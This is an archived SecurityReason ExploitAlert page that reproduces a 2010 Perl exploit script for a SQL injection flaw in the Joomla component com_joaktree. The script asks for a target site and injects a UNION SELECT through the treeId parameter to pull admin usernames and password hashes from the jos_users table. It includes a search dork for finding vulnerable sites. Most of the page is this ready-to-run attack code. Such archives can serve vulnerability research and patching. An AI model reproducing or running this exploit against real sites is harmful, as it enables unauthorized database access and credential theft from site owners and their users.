|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7860 Credit : kaMtiEz Date : 01.03.2010 Exploit Code : #!/usr/bin/perl -w ########################################################################### ################ #[~] Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId) #[~] Author : kaMtiEz (kamzcrew@yahoo.com) #[~] Homepage : http://www.indonesiancoder.com #[~] Date : 20 February, 2010 ########################################################################### ################# # #[ Software Information ] # #[+] Vendor : http://joaktree.com/ #[+] Download : http://joaktree.com/index.php/en/joaktree/downloads #[+] version : 1.1.1 or lower maybe also affected #[+] Vulnerability : SQL injection #[+] Dork : inurl:"com_joaktree" #[+] Type : Free # ########################################################################### #################### # # USAGE : perl kaMz.pl # ########################################################################### #################### "\t\t[!]=========================================================[!]\n\n"; print "\t\t [~] INDONESIANCODER TEAM [~] \n\n"; "\t\t[!]=========================================================[!]\n\n"; print "\t\t [!]Joomla component com_joaktree SQL injection exploit[!] \n\n"; print "\t\t [~] by kaMtiEz [~] \n\n"; "\t\t[!]=========================================================[!]\n\n"; use LWP::UserAgent; print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:"; chomp(my $IBL13Z=<STDIN>); $kaMtiEz="concat(username,0x3a,password)"; $tukulesto="jos_users"; $Pathloader="version()"; $r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n"; $r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1, 2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukul esto."--"; $gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom)); $contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){ print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n"; } else{print "\n[+] Exploit GAGAL GAN ![+]\n"; } ########################################################################### ################### # # GREETZZZZZ : # # INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah # tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzh ack # Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck # Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk # ########################################################################### ###################  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |